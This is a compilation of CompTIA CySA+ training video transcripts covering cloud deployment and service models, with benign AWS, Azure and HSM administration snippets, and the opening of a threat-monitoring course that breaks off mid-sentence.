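Most HSMs expose their key generation and crypto operations through the standard PKCS#11 interface. Here's a minimal Python sketch, assuming the python-pkcs11 library; the module path, token label, and PIN are placeholders that your HSM vendor's documentation would supply.

    # Minimal sketch using python-pkcs11 (pip install python-pkcs11); all names are placeholders.
    import pkcs11

    lib = pkcs11.lib("/usr/lib/vendor/libvendor-pkcs11.so")  # vendor-supplied PKCS#11 module
    token = lib.get_token(token_label="demo-token")

    with token.open(user_pin="1234") as session:
        # Ask the HSM itself to generate and hold a 256-bit AES key; it never leaves the device.
        key = session.generate_key(pkcs11.KeyType.AES, 256, label="data-at-rest-key")

        iv = session.generate_random(128)                    # 128-bit IV for AES-CBC
        ciphertext = key.encrypt(b"sensitive data", mechanism_param=iv)
        print(len(ciphertext), "bytes of ciphertext")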
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined securing hardware including firmware updating, device configuration,
SCADA, and IoT. We did this by exploring how to address mobile devices and IoT weaknesses. How to use
the shodan.io web site to examine lists of vulnerable devices. We looked at how to physically secure facilities
and computing equipment. And how vehicles and drones can present a potential security risk.
We talked about how SCADA is used for industrial device networks, about BIOS and UEFI security settings,
how Self Encrypting Drives provide protection for data at rest, and the use of hardware security
modules, otherwise called HSMs. In our next course, we're going to move on to explore factors that an
organization should consider when using or migrating from on-premises environments to cloud environments,
including cloud deployment and service models.
CompTIA Cybersecurity Analyst+: Cloud Computing
These days, it's almost all about the cloud—public, private, hybrid, and community varieties—but how much
do you really know about these mysterious unseen dimensions? As more and more organizations use or
migrate on-premises IT systems and data into cloud environments, understanding the trendy concept has
become both necessary and increasingly complex. In this 12-video course, learners are exposed to the basics of
this new cloud world, including the four most popular cloud service models: Infrastructure as a Service (IaaS),
Platform as a Service (PaaS), Software as a Service (SaaS), and Infrastructure as Code. First, you will learn the
five primary characteristics of every cloud—resource pooling, self-provisioning, rapid elasticity, metered
usage, and broad access. Then examine each characteristic in more detail: learn how to determine when to use
a public, private, community, or hybrid cloud; how cloud service models delivered over a network are
categorized. The course helps to prepare learners for the CompTIA Cybersecurity Analyst+ (CySA+) CS0-002
certification exam.
Table of Contents
Objectives
discover the key concepts covered in this course
[Video description begins] Topic Title: Course Overview [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
Trainer and Consultant [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
consultant, as well as an IT tech author and editor. I've held, and still hold, IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT
security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst or CySA+ Certification Exam is designed for IT professionals
looking to gain Security Analyst skills to perform data analysis, to identify vulnerabilities, threats, and risks to
an organization, to configure and use threat detection tools, and secure and protect an organization's
applications and systems. In this course, we're going to explore considerations when using or migrating to a
cloud environment, including cloud deployment models and service models.
I'll start by examining the characteristics of cloud computing, and how to determine when to use a public,
private, community, or hybrid cloud service. I'll then explore how cloud service models delivered over a
network are categorized. Next, I'll examine examples of the different cloud computing services, including
Infrastructure as a Service, Platform as a Service, Software as a Service, and Anything as a Service. Lastly, I'll
demonstrate how to deploy cloud resources using a JSON template.
After completing this video, you will be able to recognize the characteristics of cloud computing.
Objectives
[Video description begins] Topic Title: Cloud Computing Characteristics. Your host for this session is Dan
Lachance. [Video description ends]
Cloud computing is identified by 5 primary characteristics. They are resource pooling, self-provisioning, rapid
elasticity, metered usage, and broad access. Let's go through each of these cloud computing characteristics in a
bit more detail, starting with resource pooling. The Cloud Service Provider, or the CSP, provides the
underlying hardware infrastructure, starting at the property and the building or facility that houses all of the
data center equipment, like servers, network switches, storage arrays, backup devices, and so on.
Now, due to economies of scale, meaning that there are so many public cloud customers, at least from a public
cloud perspective, the Cloud Service Provider can offer the use of this infrastructure at a low price. That's in
opposition to a single organization paying upfront, in terms of a capital investment, for hardware that it needs,
like servers and storage arrays and network infrastructure. Another cloud computing characteristic is
self-provisioning.
This allows quicker access to services because cloud customers don't have to, for example, submit a ticket to a
help desk before, let's say, a new virtual machine is deployed or more cloud storage space is allocated. The
self-provisioning can happen at the command line, so many public cloud providers will offer the ability to use
some kind of CLI, Command-Line Interface or PowerShell cmdlets to deploy and manage cloud resources.
And of course, there are GUI tools through web interfaces for the deployment and management of a cloud
environment.
The next characteristic is rapid elasticity. We're talking here about quick resource provisioning. So, one
example of this is horizontal scaling, scaling in and scaling out. What this means, for example, is with a load
balancer, either manually or in an automated fashion, having a load balancer automatically add virtual machine
instances, that's scaling out, to support a busy application workload, or when things quiet down, to save on
costs, removing virtual machine instances because they're not needed. And that would be scaling in.
There's also vertical scaling, scaling up and down. Scaling up would be, for instance, looking at an existing
virtual machine and determining it doesn't have enough horsepower, so maybe increasing the number of virtual
CPUs or the amount of RAM it supports. Scaling down, of course, means reducing those items when they're
not needed for the workload running in the virtual machine. Naturally, the more horsepower, the more cost.
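As a simplified illustration of the kind of rule an autoscaling policy evaluates, here's a small Python sketch; the metric, thresholds, and instance counts are made up purely for the example.

    # Simplified sketch of a horizontal-scaling decision (scale out / scale in).
    def desired_instance_count(current_count, avg_cpu_percent,
                               scale_out_at=75, scale_in_at=25,
                               min_count=2, max_count=10):
        if avg_cpu_percent > scale_out_at and current_count < max_count:
            return current_count + 1   # scaling out: add a VM instance
        if avg_cpu_percent < scale_in_at and current_count > min_count:
            return current_count - 1   # scaling in: remove a VM instance
        return current_count           # load is within range: no change

    print(desired_instance_count(current_count=3, avg_cpu_percent=82))  # 4
    print(desired_instance_count(current_count=3, avg_cpu_percent=15))  # 2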
Then, there's metered usage, kind of like a utility, like water or electricity. In the cloud, this is called pay-as-
you-go. Basically, as a cloud customer, monthly charges are based on resource consumption, so the more
virtual machines or databases you have deployed and up and running, the more storage space you're using in
the cloud, the more you pay.
So it's important, then, to save on costs by shutting down or disabling or removing cloud resources that you are
not using. Broad access is the next cloud computing characteristic. It allows accessibility to services over a
network, whether that's a private network, because you could have a private cloud only available and used by a
single organization. Of course, you could also have a public cloud environment where users could access
software over the Internet, such as using Gmail, for example. That's an example of a cloud service. There's also
devices like IoT devices and manufacturing robotic devices, laptops, tablets, and smartphones that can be used
to access cloud services over a network.
In this video, learn how to determine when to use public cloud services.
Objectives
determine when public cloud services should be used
[Video description begins] Topic Title: Public Cloud. Your host for this session is Dan Lachance. [Video
description ends]
In order for a cybersecurity analyst to properly assess risk and mitigate the impact of realized threats in a cloud
environment, there needs to be an understanding of cloud computing and the different types of cloud models.
A public cloud environment is accessible to Internet users, anybody that wishes to sign up with an account.
And so, public cloud providers have worldwide geographic locations. They have a presence with their data
centers in many different parts of the world.
Now, this is usually a moving target. It's usually changing all of the time as public cloud providers expand
around the globe. So the cloud provider, then, is responsible for the hardware in their data centers around the
world that allow cloud services to be a reality. And they are also responsible for ensuring tenant isolation. A
tenant is a cloud computing customer. And so, two organizations that might subscribe to a public cloud
provider are kept completely separate from one another at every level. So you don't have one tenant that can
see the configuration or data of another cloud tenant.
Then, there's regulatory compliance. Most public cloud providers will provide documentation as to which
security standards and regulations that their services are compliant with. But the thing to bear in mind is that,
just because a cloud provider like Microsoft Azure, or maybe it's Amazon Web Services, it could be any cloud
provider, just because they're compliant with PCI DSS for credit card holder information doesn't mean that
automatically you are, no matter how you use the cloud services. So some of the onus for compliance falls on
you, the cloud customer.
The other thing to think about with clouds is Service Level Agreements or SLAs. These are documents that
guarantee a level of service for a specific cloud service, whether it's storage, virtual machines, databases, and
so on. So, SLAs are unique per cloud service offering. There is a split responsibility, depending on which
service is being used in a public cloud. For example, if technicians in your organization are deploying virtual
machines in the public cloud, it is their responsibility to maintain the configuration of those VMs and to apply
operating system patches and maybe even app software patches, if app software is installed.
But the underlying responsibility for the hypervisor, or the physical equipment that supports those virtual
machines, that's the responsibility of the Cloud Service Provider. The other thing to bear in mind is that, with
the public cloud, some service offerings might vary from one region to another. So just because a new fancy
cloud service is available in the American West doesn't necessarily mean it's available in Central Canada or in
Western Europe.
Public cloud providers serve as a form of risk transference. It's essentially outsourcing. We're outsourcing
some level of the risk associated with IT services to a 3rd party. Now, a 3rd party, of course, is the public
cloud provider. So we need to think, then, about the security of how we are getting to the public cloud, our
network link. Are we using a VPN or a dedicated circuit or just connecting straight over the Internet?
Now, when you're connecting straight over the Internet without a VPN, most cloud services are still protected
using HTTPS. Common public cloud providers around the world include Google Cloud Platform, IBM Cloud,
Microsoft Azure, Alibaba Cloud Computing, especially prevalent in China, and Amazon Web Services.
[Video description begins] Topic Title: Private Cloud. Your host for this session is Dan Lachance. [Video
description ends]
There are times when an organization or a government agency wants complete and entire control of an IT
infrastructure. And that's where private clouds can come in. Private clouds are accessible only to a single
organization, so it's organization-owned hardware.
However, it still adheres to all cloud characteristics, meaning self-provisioning, rapid elasticity, broad access,
metered usage, and so on. So all of those things are still in effect because otherwise, it wouldn't be called a
cloud environment. So often, departmental chargeback is used within an organization. Because one of the
cloud characteristics is metered usage, or pay-as-you-go, that means the usage of cloud resources, so be it
virtual machines or some kind of software being used over the network or storage, whatever the case might be,
it is tracked per department, or maybe even project.
And so, what this means, then, is, on a monthly basis, for example, each department or project within the
organization is billed for the amount of resources they used in the private cloud, and they must pay it to the
central authority controlling it, such as the IT department. Private clouds are interesting also, in that, because
all of the control is in the hands of a single entity, so a single organization or government agency, that also
means all of the responsibility falls on them. In some cases, for regulatory compliance reasons, the use of a
private cloud might be mandated.
All of the security controls that address any potential threats are internal, and they are fully controlled by the
organization. So private clouds work best when an organization or government agency, I guess we could say
an entity, requires full and complete control and has exclusive use of that cloud computing infrastructure.
[Video description begins] Topic Title: Community Cloud. Your host for this session is Dan Lachance. [Video
description ends]
A community cloud is a cloud deployment model that serves customers with the same types of needs, in terms
of their IT computing services, so, same needs across multiple cloud tenants or customers. And those
requirements might be related to sensitive data encryption. They might have to use an isolated type of
community cloud environment for regulatory compliance, isolated meaning not anyone in the public can just
sign up and have access to that cloud environment.
It might be required, for example, that the management of data centers for that cloud is done by people of a
certain nationality, such as by US persons. Or, it might be something that has to be compliant with certain
security standards, like the Federal Risk and Authorization Management Program, or FedRAMP, in the United
States for government agencies.
Now, government clouds are available with the larger public cloud providers. These government clouds use
physically isolated data centers, meaning isolation from data centers that the general public could sign up for
and access services from. One example would be some of the standards required by the Department of Justice,
so DOJ CJIS in the United States. CJIS stands for Criminal Justice Information Services.
So government clouds would have to be compliant with the standards set out by DOJ CJIS in order for
government agencies dealing with criminal justice information to use a cloud environment. There's also
FIPS 140-2 compliance. The Federal Information Processing Standard, or FIPS, is a US government standard
that specifies the strength of cryptographic modules that are used to secure data.
And of course, we mentioned FedRAMP compliance. FedRAMP, the Federal Risk and Authorization
Management Program, is a standardized way to apply security to IT systems, such as those being used in the
cloud.
[Video description begins] Topic Title: Hybrid Cloud. Your host for this session is Dan Lachance. [Video
description ends]
A hybrid cloud combines multiple cloud models. For instance, you might have a hybrid cloud environment if
you are migrating on-premises systems and data into a cloud environment. And that can take time, and so, you
might have a hybrid cloud that exists only during the migration phase, or you might keep it up and running for
synchronization purposes over the long term. So, here are some examples.
You've got data stored on-premises and you replicate it into the cloud. You might also have a hardware VPN
solution linking your on-premises network to a cloud VPN, so that you've got an encrypted tunnel through
which you can synchronize data and access cloud resources, and it's kept secure. Another thing to think about
is the use of public and private cloud services. This is an example of a hybrid cloud environment, as well as the
use of on-premises services. So it could be any combination of these types of things that constitutes a hybrid
cloud.
Hybrid clouds are often found when you're running parallel systems on-premises and in the public cloud. This could be for migration purposes, as we've already identified, but also, it could be used for a disaster recovery-type solution, where you've enabled failover. If the on-premises solution fails, it fails over into
the cloud. So we've already mentioned that you can also replicate on-premises data into the cloud.
Now, this can be done on a continuous basis, or you essentially could have an on-premises virtual machine that
appears as a backup appliance, or a backup target. And so, on-premises systems might back up to this on-
premises backup target, which, in turn, replicates to the cloud, which allows you to have off-site storage.
recognize how self-provisioned, metered elastic services delivered over a network are categorized
[Video description begins] Topic Title: Cloud Service Models. Your host for this session is Dan
Lachance. [Video description ends]
We already know that there are a number of cloud deployment models. We've got public clouds, private
clouds, community clouds, and hybrid clouds. But within each, we also have cloud service models, how IT
solutions are made available to different sets of users, depending on needs. First of all, we have to cover
Anything as a Service, or X-a-a-S. This is a broad term that refers to running IT solutions or accessing them
over a network where it's actually being run on equipment elsewhere.
So, this really correlates to a specific type of cloud service, whether we're talking about running virtual
machines in the cloud, running databases, running websites, using cloud storage, or even using software
developer tools in the cloud. Infrastructure as a Service, or IaaS, deals with compute infrastructure, things like
virtual machines, or using cloud storage, or defining any type of cloud virtual network configuration.
So configuring virtual networks and subnets and IP address ranges, configuring route tables and firewall ACL
rules in the cloud, all of this constitutes Infrastructure as a Service. Platform as a Service, or PaaS, is most often aimed at software developers, though not exclusively. It allows for the deployment of databases as managed services.
Now, a managed service means that you don't have to deal with the underlying technical complexities. In the
case of a database managed service, it means we can simply, for example in a GUI, with a few clicks, define
that we want a MySQL database deployment with this kind of horsepower, go. And we don't have to worry
about manually setting up the underlying virtual machines, and manually installing the database software, and
so on. Search facilities are also another part of Platform as a Service that would be useful for developers.
Again, it's a managed service, where there's a quick configuration for developers to enable things like
searching through indexes, that might apply to web applications hosted in the cloud. There's cluster-based
processing, so having clusters of computers working together to solve problems, such as big data analytics.
And there's also many different types of programming components that software developers can deploy in the
cloud in what's called a serverless architecture, serverless meaning, well, there's a server running in the
backend at some level, but not that the developer knows about, and nor are they responsible for it.
So, if a developer wants to start defining custom APIs, Application Programming Interfaces, in the cloud, it's
very quick and easy to do, without the developer having to set up a server to host it. Same with dealing with
message queues to allow different software components to communicate with one another. This can be done
very easily in the cloud, without the developer having to set up a server to host it in the first place. It's a
managed service. Then, we have Software as a Service, or S-a-a-S. This is generally thought of as end-user
productivity software, which is correct. It also includes things like cloud storage user interface tools.
Now, you might say, "Well, I thought cloud storage was Infrastructure as a Service." Well, it is, depending on
who's configuring and using it. If an individual user is using Dropbox or Microsoft OneDrive or Google Drive,
that is also configured by that user, and it's also considered to be Software as a Service. They're accessing
some kind of end-user productivity service over a network, so they can store things like Office productivity files. Cloud-based email is also Software as a Service, as are other office productivity tools like spreadsheets, word processors, presentation software, and so on.
After completing this video, you will be able to provide examples of IaaS.
Objectives
[Video description begins] Topic Title: Infrastructure as a Service. Your host for this session is Dan
Lachance. [Video description ends]
Infrastructure as a Service, or I-a-a-S, otherwise called IaaS, is the infrastructure that we would normally have
even on-premises to support IT computing processes, so things like storage, things like networking, things like
having servers up and running to support mission-critical workloads. So, here in the Amazon Web Services
cloud, I've already signed in with my account to the "AWS Management Console" GUI.
So, as an example of some Infrastructure as a Service that we might deploy here in the cloud through self-
service provisioning, I'm going to search up "VPC". "VPC" in Amazon Web Services stands for Virtual
Private Cloud. In other words, it's a virtual network that you define in the cloud with IPv4 or IPv6 support.
So, for example, I'm going to go to "Your VPCs". I already have one, but I'm going to create another one with
the "Create VPC" button. I'm going to call it "VPC2", and I'm going to assign it an IPv4 CIDR block. In this
case, how about we choose "12.0.0.0/16". So the 1st 2 octets, or 1st 2 bytes, so "12.0." identify our network
range. The "Tenancy" here is going to be "Default". I don't need "Dedicated" underlying hardware from
Amazon Web Services to support this. I'm going to leave it on "Default Tenancy", and I'll click "Create". And
then I'll close out. So now I've got "VPC2".
Now, normally, the next part of the infrastructure I would define would be a subnet within that range,
"12.0.0.0/16". So I'm going to go to "Subnets", and I'm going to click "Create subnet". And this is going to be
called "VPC2_Subnet1". Going to tie it, of course, to what we just created, "VPC2". And we can see the
"CIDR" range here, so I'm going to go ahead. Now, that's for the VPC. I'm going to go ahead and specify
"12.0", let's say, ".1.0/24". So the subnet range needs to fall within the network range. And these are network
addresses, not individual host addresses. So I'm going to go ahead and click "Create". We now have a subnet.
So we can see "VPC2_Subnet1" and we can see the "CIDR" range listed there for it. I'm going to go back to
the main part of the AWS Console here. We can also work with storage. Here, that would be "S3", Simple
Storage Service here at Amazon Web Services, where you can create what's called a storage bucket. There's a
"Create bucket" button. And this allows you, if I were to open up one of these buckets, to store any data you
want in the cloud environment. You can "Upload" existing files, or store new ones in here, and you can enable
things like encryption and so on.
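The same self-service provisioning shown here in the console can also be scripted. Here's a minimal sketch, assuming the AWS CLI is installed and configured with credentials; the VPC ID and bucket name are placeholders you'd substitute with your own values:

    # Create a VPC with the 12.0.0.0/16 range, then a subnet inside it
    aws ec2 create-vpc --cidr-block 12.0.0.0/16
    aws ec2 create-subnet --vpc-id vpc-0abc1234 --cidr-block 12.0.1.0/24

    # Create an S3 bucket for object storage (bucket names must be globally unique)
    aws s3 mb s3://my-example-bucket-12345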
And finally, another example, common example of cloud Infrastructure as a Service would be virtual
machines. In AWS, that's called "EC2", Elastic Compute Cloud. These are virtual servers or virtual machines
in the cloud. So, I'm going to go into "EC2", and I'm going to go into the "Instances" view. An EC2 instance is
a cloud-based virtual machine. We can see there are some here already. I want to deploy another one into my
newly-created VPC subnet. So I'll click "Launch Instance".
From here, I have to choose an image, whether it's Linux, or whether it's Windows-based. So maybe I'll choose
"Windows Server 2019 64-Bit". And as I scroll through this config, I can determine the vertical scaling. So the
instance "Type" determines the number of virtual CPUs, the amount of RAM, and actually, the more
horsepower, the more cost. I'm just going to accept a lot of the defaults here, but I do want to make sure, on
"Step 3", that I put this in in "VPC2_Subnet1".
Now, I can also determine whether I want a "Public IP" address for this instance, so I'm just going to make
sure that that is disabled, and then I'm going to click "Next". I can add additional storage devices. And finally,
on "Next", I'll add a tag here called "Name". I'm going to call it "WinSrv2019-2". That's not the Windows
operating system hostname, that's just a name here that we'll see it listed as in the Amazon Web Services GUI.
The "security group", I'm going to choose an existing one here. This controls the traffic that's allowed into and
out of the virtual machine instance. And then, when I go to "Launch" this, I'm going to select an existing "key
pair" here that I've already defined, and acknowledge that I have the private key part, which is required for me
to decrypt the admin password to authenticate to the instance. I'm going to go ahead and choose "Launch
Instance", and I'll click on the instance ID link that's provided here, and we can see that our virtual machine
instance is now in the midst of starting up.
So we can see that the "Instance State" is "running", the operating system's still "Initializing". Down below,
there's no "Public IP" for the selected instance because I disabled that, but it does have a "Private IP". Now, if
it did have a "Public IP", and you wanted to connect directly to it over the Internet, you could select that virtual
machine and choose "Connect". And from here, when you click "Get Password", you would have to make sure the server was up and running and fully initialized, and then, you'd have to specify your private key to decrypt the password.
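For reference, a comparable launch could be done from the AWS CLI. This is only a sketch; the AMI ID, subnet ID, security group ID, and key pair name are placeholders, not values from this demo:

    # Launch a Windows Server instance into the subnet, with no public IP, tagged with a Name
    aws ec2 run-instances \
      --image-id ami-0abcdef1234567890 \
      --instance-type t3.medium \
      --subnet-id subnet-0abc1234 \
      --security-group-ids sg-0abc1234 \
      --key-name MyKeyPair \
      --no-associate-public-ip-address \
      --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=WinSrv2019-2}]'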
[Video description begins] Topic Title: Platform as a Service. Your host for this session is Dan
Lachance. [Video description ends]
In the cloud, Platform as a Service, or PaaS, P-a-a-S, is primarily of interest to software developers. It allows them to quickly deploy code solutions for software development, or databases, without having to provision the underlying servers and all the software that needs to be installed to make those things
happen.
So, as an example, here in Amazon Web Services, if I were to search for the word "code", then I have a lot of
developer tools available here, such as "CodeBuild", "CodeCommit", "CodeDeploy", "CodePipeline",
"CodeStar", and so on. And if I search for "RDS" for "Relational Database Service", I'll click on that, we have
a quick and easy way to deploy a variety of different types of database solutions, which would be of very big
interest for developers, so they don't have to worry about provisioning the underlying servers and installing the
database software, and so on.
So, I'm going to go ahead and click on "Create database", and in this case, I'll choose "Easy Create". Let's say
it's "MySQL", but notice the different types of database engines available. It's quite the selection for just a few
clicks. "MySQL", "PostgreSQL", "Oracle", "Microsoft SQL Server", and so on. I'm going to select the "Free
tier" here down below, just for testing purposes. It's going to call the database instance "database-1".
I just really need to specify the admin password here, so let me go ahead and do that and confirm it. And
because I've selected the "Easy create" option, I can see what that means, in terms of default configurations, so "Encryption" is "Enabled". I can see the "VPC", or cloud network, that it's being deployed into, and the "Database Port", which is the standard MySQL listening port, 3306. I'm okay with all of that, so I'm just going to go ahead
and click "Create database".
And we can now see that we are in the midst of creating a database. Under the "Status" column, it says
"Creating". Now, how easy is that? With just a few clicks and a few seconds, you can start deploying a
relational database with minimal effort. And that's the type of thing that we can experience when working with
Platform as a Service in a cloud environment. Now, I can click on that database link at any point in time to
check out some performance metrics, and also to take a look at the configuration of it, and optionally, make
changes if I want to.
Now, because it's still in the midst of being created, the "Modify" button is unavailable, it's grayed out. But
we'll be able to make any changes that we deem appropriate here, including, if I go back here and select the radio button for the database, we can even go to the "Actions" button and choose "Create read replica", so that we might have another replica in another location for high availability, or for heavy read operations against the contents of the database. The beauty is, it's minimal effort, maximum results.
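As a hedged command-line equivalent of that Easy Create workflow, something like the following could request a small MySQL instance and, later, a read replica; the identifiers and password shown here are placeholders:

    # Create a small MySQL instance as a managed service
    aws rds create-db-instance \
      --db-instance-identifier database-1 \
      --engine mysql \
      --db-instance-class db.t3.micro \
      --allocated-storage 20 \
      --master-username admin \
      --master-user-password 'ChangeMe123!'

    # Later, add a read replica for high availability or heavy read workloads
    aws rds create-db-instance-read-replica \
      --db-instance-identifier database-1-replica \
      --source-db-instance-identifier database-1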
After completing this video, you will be able to provide examples of SaaS.
Objectives
[Video description begins] Topic Title: Software as a Service. Your host for this session is Dan
Lachance. [Video description ends]
In cloud computing parlance, Software as a Service, S-a-a-S, otherwise called SaaS, comes in many different
forms. I've chosen to use Office 365, where I've signed in with my account. And we can see that we have a
number of different offerings, essentially software that's made available for end users over a network, in this
case, over the Internet.
I don't have to worry, as a cloud customer here, about the underlying server hardware, and whether there's
enough RAM or enough storage space or how the network is configured, and so on. All I do is use this
software over a network, in this case, using a web browser interface. It doesn't get more convenient than that.
So for example, if I want to click on "OneDrive" and start taking a look at any cloud storage, I can start to
work with that. Or, if I want to go check my "Outlook" email or use Microsoft "Word" so I can start building
documents here in the cloud, and even working with them and sharing them with other cloud users. The same
would be true if I'm working in Microsoft "Excel". I can work with spreadsheets directly here in the cloud by
clicking "New blank workbook". All of this within a web browser accessing the service over a network,
specifically Software as a Service.
Now, the responsibility of the underlying infrastructure, of course, falls upon the Cloud Service Provider, in
this case Microsoft. But the use of Software as a Service solutions and securing the resultant data, such as
sensitive spreadsheet files, the security of that would fall upon myself, the cloud tenant, cloud customer, cloud
user, whichever term you would prefer to use.
So, there is a shared responsibility, then, at the Software as a Service level, where we are responsible for
securing the result of using S-a-a-S solutions, while the Cloud Service Provider is responsible for the
underlying infrastructure and its availability.
[Video description begins] Topic Title: Infrastructure as Code. Your host for this session is Dan
Lachance. [Video description ends]
Infrastructure as Code is a term that is used to refer to the fact that we can use code, in other words, syntax in a
text file, whether it's XML or JSON, that has the instructions to deploy or manage cloud resources. And so,
we're going to take a look at how that gets done in a Microsoft Azure cloud environment. We've already got an
Azure account, and I've already signed in to the Azure portal, so I'm going to click "Create a" new "resource".
What I want to create here is a template deployment. In other words, I want to deploy resources from a
template. So, I'm going to search for the word "template", and I'm going to choose "Template deployment".
Now, from here, we're going to have a number of options after we click the "Create" button. We can select
from some very standard and common templates, such as to "Create a Linux virtual machine", "a Windows
virtual machine", "a web app"lication, "a SQL database". We can even "Build" our "own template in the
editor".
It opens up with an editor here, where we've got the basic foundation here in JSON format, that's JavaScript
Object Notation, J-S-O-N, where we can add the appropriate code here to deploy different types of Microsoft
Azure cloud resources, and also maybe pass parameters in, so that we can reuse the templates, and we haven't
hard-coded things like virtual machine names or subnet IP address ranges. However, I'm going to "Discard"
this. We can also choose one of these existing common templates, such as to "Create a Linux virtual machine".
Now, you might wonder, "How is this different than just deploying a Linux virtual machine in this interface
anyways?" It's very simplified. Depending on the template you choose, you'll only be asked to supply a few
pieces of information. So, there's not very much here, it's all on one page, so that's the purpose of doing that.
However, I don't want to use this template, so I'm just going to go back to the "template deployment" part. So
I'm going to go back, and basically, I'm going to create a new template deployment, because what we're going
to take a look at is that you can refer to a variety of template repositories out there on the Internet.
So, I'll just search up "template deployment", we'll pop that up once again, click "Create". And this time, down
at the bottom, I'm interested in the "GitHub quickstart template"s that we can refer to. So I can click in there
and then "Type to start filtering". Well, that's interesting. Okay, so I'm going to type in the word "web", and
from here, we can start seeing some of the result of that. So I want a "webapp" that runs on a "basic linux"
deployment.
So if I select that template, we can then "Select" or "Edit" the template, I'm going to select it as it is, to start
deploying items. It just needs a few pieces of information, such as the "Resource group" that I want to deploy
these resources into. Select one I already have called "RG1", and I can specify the "Web App Name", and so
on, as we go further down through the list.
But really, one of the beauties of templates is that they could potentially require minimal information before
quickly deploying the resources. I'm going to choose "I agree to the terms and conditions", and I'm going to
choose "Purchase". And at this point, we can see the deployment is currently in progress. I can click on that
link from the notification to kind of track what's being deployed and I'll know when it's ready to go.
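To make the Infrastructure as Code idea concrete outside the portal, here's a minimal sketch: a bare-bones ARM template skeleton in JSON and an Azure CLI deployment into an existing resource group. The file name and the RG1 resource group are assumptions carried over from this demo:

    # Save an almost-empty ARM template skeleton (no resources defined yet)
    cat > template.json <<'EOF'
    {
      "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
      "contentVersion": "1.0.0.0",
      "parameters": {},
      "variables": {},
      "resources": []
    }
    EOF

    # Deploy the template into an existing resource group with the Azure CLI
    az deployment group create --resource-group RG1 --template-file template.json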
Objectives
[Video description begins] Topic Title: Course Summary. Your host for this session is Dan Lachance. [Video
description ends]
So, in this course, we've examined what an organization should consider when using or migrating their on-
premises IT systems and data to a cloud environment, including the various cloud deployment models and
service models that are available.
We did this by exploring the characteristics of cloud computing, how to determine when to use a public,
private, community, or hybrid cloud, how cloud service models delivered over a network are categorized. We
looked at examples of cloud computing services, such as Infrastructure as a Service, Platform as a Service,
Software as a Service, and we talked about how generally, these are all referred to as Anything as a Service, X-
a-a-S.
We also looked at how to deploy cloud resources using a JSON template, which is referred to as Infrastructure
as Code. In our next course, we'll move on to explore threat monitoring and how centralized monitoring
solutions can be used to help identify suspicious activity and also to help reduce business disruptions and
reduce response time to incidents.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+, certification exam is designed for IT professionals looking to gain security analyst skills, to perform data analysis to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection tools, and to secure and protect an organization's applications and systems.
In this course, we're going to explore threat monitoring, including the use of centralized monitoring solutions
for identifying suspicious activity and reducing response time. I'll start by examining the relationship between
continuous monitoring and quick security incident response time and I'll explore the relevance of the various
common log types. I'll then demonstrate how to view cloud-based audit events and how to send Linux log
events to a centralized logging host. Next, I'll show how to perform Windows event log filtering. Then I'll
demonstrate how to configure cloud based alarms. I'll continue with an examination of how the OSI model
layers relate to communications hardware and software. And I'll explore what to watch for when analyzing
network traffic and an email ecosystem. Lastly, I'll explore where to use honeypots to monitor malicious activity, how SIEM provides centralized security event monitoring and management, and how to identify suspicious activity by filtering out noise.
In this video, find out how to link continuous monitoring with quick security incident response times.
Objectives
[Video description begins] Topic title: Continuous Monitoring. The presenter is Dan Lachance. [Video
description ends]
The continuous monitoring of IT solutions is directly related to quick security incident response times. So
continuous monitoring is very important when it comes to security. We're talking about the monitoring of both
on-premises resources like servers, and irregular network activity, that type of thing, as well as monitoring
cloud resources. And many public cloud providers have centralized monitoring solutions which collectively
are referred to as monitoring as a service, or MaaS.
Monitoring means looking at things like performance metrics, such as server availability over the network, CPU utilization, disk I/O metrics, database cache hit ratios, and so on. Availability, making sure that a service is reachable. And security-related events, such as failed connections or failed login attempts. So all of this is related to performance. And performance is an important part of monitoring, not only to make sure that things are running efficiently, but because an abnormal performance spike can also be indicative of some kind of a security compromise. So monitoring is useful for proper resource governance and for determining the efficacy of implemented security controls: are they effective in mitigating risk? It's also important for accountability, so we can determine which service, software component, or user performed a specific action against a resource. And then we might require monitoring to ensure legal and regulatory compliance.
Continuous monitoring deals with the time it takes to detect a logged security event. Obviously, less is better.
Now, having a delayed incident response is bad. Again, that's kind of obvious. But in 2016, based on reported security incidents, the average incident response delay was 191 days. Not seconds, minutes, or hours, days. This means there was quite a prevalence of advanced persistent threats, where hosts or networks remained compromised for extended periods of time. But why is this? Well, it usually means that there isn't some kind of proper security baseline that's looking for abnormal activity. Or it could mean that updates to firmware and software are not being applied as quickly as possible when they're made available. So
continuous monitoring will help with this. It lets us detect suspicious activity and breaches by looking at things
like abnormal performance spikes for CPU utilization or the amount of network traffic. But you can only
decide what's abnormal when you first know what is normal. So you have to establish security and
performance baselines for continuous monitoring to be effective.
The next thing to think about is logging and behavioral analysis. Now, you can enable logging at many
different levels. So you could have logging for a custom application. Or for the operating system or
commercial off-the-shelf, or COTS, software. Either way, logs need to be reviewed, otherwise what's the
purpose of having them? Now, that can be done manually, but in a larger enterprise, that just doesn't make
sense. Instead, having automated tools, intrusion detection systems that look into logs, looking for suspicious
activity or specific items can be helpful. Setting up log alerts, so that we might get alerted when specific types
of events occur and are written to a log file. A lack of auditing is a problem, if we're not auditing things like
access to applications or files.
[Video description begins] Auditing should also be done for failed login attempts. [Video description ends]
Behavioral analysis is also important. We refer to this as user and entity behavior analytics, otherwise called
UEBA, U-E-B-A. In essence, we're talking about detecting suspicious or abnormal host and network activity.
We already know we need a baseline of what's normal for that to be possible. So looking at performance, such
